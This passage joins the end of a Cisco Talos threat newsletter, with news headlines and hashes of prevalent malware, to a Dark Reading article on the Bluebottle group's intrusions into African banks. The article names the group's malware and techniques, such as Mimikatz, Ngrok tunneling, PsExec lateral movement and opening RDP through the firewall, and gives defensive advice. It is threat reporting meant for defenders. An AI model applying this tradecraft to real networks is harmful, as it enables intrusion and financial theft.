We expect this data-driven story will shed some light on Cisco’s (and the security community’s) most notable successes and remaining challenges. Through the upcoming weeks, we will be highlighting different aspects of this story, including our efforts in Ukraine, the disastrous Log4j vulnerabilities, adversarial use of offensive frameworks and software native to the victim’s machine, shifts in the ransomware landscape, the ever-present threat of commodity loaders/trojans, as well as an overview of some of the advanced persistent threats (APTs) we are most concerned with. Throughout the story, one key theme is clear: _adversaries are adapting to shifts in the geopolitical landscape, actions from law enforcement, and the efforts of defenders. Defenders will need to track and address these shifts in behavior to remain resilient._

**So now what?**

While yes, we’ve moved into another new year the Talos 2022 Year in Review is the gift that keeps on giving. If you’ve yet to read the report, you can catch the cliff notes version in our four part livestream series covering the full report and corresponding topics. Join us January 10th at 12pm ET for our next livestream 2022 Year in Review: APTs on our Talos LinkedIn or Twitter page.

**Top security headlines of the week**

The not-so-bad-guys? The LockBit ransomware group apologies for attacking the Hospital for Sick Children (SickKids) after one of its members violated their rules by attacking a healthcare organization. In their apology, LockBit stated the member is blocked and no longer in their affiliate program and offered a free decryptor for the hospital to recover impacted files. (Bleeping Computer)

Meta was fined over $4 million for breaching the EU’s General Data Protection Regulation (GDPR) personal data laws on Facebook and Instagram according to Ireland’s Data Protection Commission. In a statement the commission stated Meta breached “it’s obligations in relation to transparency” and “for its processing of personal data for the purpose of behavioral advertising”. (SecurityWeek)

All was not calm over the holidays as PyTorch has recently identified a malicious dependency under the same name as the framework’s ‘torchtriton’ library. PyTorch admins are urging users who recently installed PyTorch-nightly to uninstall the framework with the counterfeit ‘torchtriton’ dependency. (SC Media)

**Can’t get enough Talos?**

2022 Year in Review Report

Beers with Talos

Talos Takes

Ukraine Topic Summary

2022 Year in Review: Ukraine livestream on demand

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)

Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)

Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256: 1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d

MD5: 26f927fb7560c11e509f0b8a7e787f79

Typical Filename: Iris QuickLinks.exe

Claimed Product: Iris QuickLinks

Detection Name: W32.DFC.MalParent

SHA 256: 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725

MD5: d47fa115154927113b05bd3c8a308201

Typical Filename: excel.exe

Claimed Product: N/A

Detection Name: W32.00AB15B194-95.SBX.TG

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934

MD5:   93fefc3e88ffb78abb36365fa5cf857c

Typical Filename: Wextract

Claimed Product:  
Internet Explorer

Detection Name: W32.File.MalParent

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5:  2915b3f8b703eb744fc54c81f4a9c67f

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Simple\_Custom\_Detection

SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa

MD5:  df11b3105df8d7c70e7b501e210e3cc3

Typical Filename: DOC001.exe

Claimed Product: n/a

Detection Name: Win.Worm.Coinminer::1201

Threat Source newsletter (Jan. 5, 2023): Digging out of our inboxes

The financially motivated threat group, also known as OPERA1ER, demonstrated an evolution in tactics in its compromise of three Francophone financial institutions in Africa, likely adding to its $11 million to-date haul.

A criminal group, which has already stolen nearly $11 million by specializing in targeted attacks against the financial sector, has French-speaking African banks in its crosshairs in a recent campaign that demonstrates an evolution in tactics, researchers have found.

Bluebottle, aka OPERA1ER, compromised three different financial institutions in three separate African nations between mid-July and September, affecting multiple machines in all three organizations, researchers from Symantec revealed in a blog post published on Jan. 5.

Though it's unclear if the group was able to capitalize financially on the activity, it's significant because the different payloads and other tactics that Bluebottle used in the campaign vary from previous offensives by the group, Sylvester Segura, Symantec threat intelligence analyst, tells Dark Reading. 

In particular, Bluebottle used commodity malware GuLoader and malicious ISO files in the initial stages of the attack — which it hasn't done before — as well as abused kernel drivers with a signed driver that has been linked to other attacks such as ransomware, Segura says.

These "all indicate the Bluebottle group is keeping up to date with the tools and techniques that other threat actors are currently using," he says. "They may not be the most advanced, but this latest activity proves they are following attacker trends in tooling and techniques."

Indeed, the use of signed drivers in particular shows that Bluebottle — a financially motivated group first observed in 2019 — is aiming to up its game in this latest spate of activity, forcing enterprises to do the same in terms of defensive maneuvers, Segura says.

"More and more 'less advanced' attackers are aware of the impact they can have by disabling detection solutions through various means such as using signed drivers," he notes. "To prevent the trust we put in software like signed drivers from becoming a single point of failure, enterprises need to employ as many layers of detection and protection as they reasonably can."

**Keeping Up With Bluebottle****

Group-IB first began tracking Bluebottle, which it calls OPERA1ER, in activity that spanned from mid-2019 to 2021. During this period, the group stole at least $11 million in the course of 30 targeted attacks, researchers said in a report published in November. The group typically infiltrates a financial organization and moves laterally, scooping up credentials that it can use for fraudulent transfers and other funds-stealing activity.

The activity that Symantec observed started in mid-July, when researchers spotted job-themed malware on one of the infected systems, which they believe could have been the result of a spear-phishing campaign — though they said they are not certain of the group's initial point of entry.

"These likely acted as lures," researchers wrote in the post. "In some cases, the malware was named to trick the user into thinking it was a PDF file."

Symantec researchers linked the group to the previous OPERA1ER activity reported by Group-1B because it shared the same domain, used similar tools, included no custom malware, and also targeted Francophone nations in Africa, they said.

****Living Off the Land****

After noticing the job-themed malware, researchers then observed the deployment of a downloader before detecting the commercial Sharphound hacktool as well as a tool called fakelogonscreen, researchers said. Then, about three weeks after this initial compromise, researchers saw attackers using a command prompt and PsExec for lateral movement.

"It appears the attackers were 'hands on keyboard' at this point of the attack," researchers wrote in the post, using various dual-use and living-off-the-land (LotL) tools for a number of purposes during their occupation of the network.

These tools included Quser for user discovery, Ping for checking Internet connectivity, Ngrok for network tunneling, Net localgroup/add for adding users, the Fortinet VPN client most likely for a secondary access channel, Xcopy to copy RDP wrapper files, and Netsh to open port 3389 in the firewall, among several others.

As previously mentioned, Bluebottle also used commodity tools GuLoader as well as Mimikatz, Revealer Keylogger, Backdoor.Cobalt, Netwire RAT, and the malicious DLL and driver for killing processes during their activity, along with "multiple other unknown files," the researchers wrote.

Some of the tools — such as GuLoader — were deployed across all three victims; other activity linking the three victims included the use of the same .NET downloader, malicious driver, and at least one overlapping transfer\[.\]sh URL, they said.

Researchers observed the last activity on the compromised network in September; however, the Ngrok tunneling tool remained on the network until November, they said.

****How Enterprises Can Respond****

Since Bluebottle uses mainly commodity RATs and other malware in its activity, enterprises can mitigate attacks from this threat group by ensuring they have good endpoint protection against such threats, Segura says.

"Furthermore, an extended detection and response solution should also help detect their abuse of living off the land tools like PsExec during attempted lateral movement," he says.

Since Bluebottle typically goes after credentials immediately in its attacks for financial gain, multifactor authentication can also go a long way in helping enterprises protect accounts and monitor for suspicious account activity, Segura says.

Other steps enterprises can take to counter activity from Bluebottle specifically include allowing applications that "will help prevent the malicious use of dual-use tools like Ngrok, which they use for hiding their presence," he says.

"Finally, training employees to look out for phishing and other malicious emails is going to be crucial to prevent a group like this from intruding in the first place," Segura adds.

**

Tag

#mac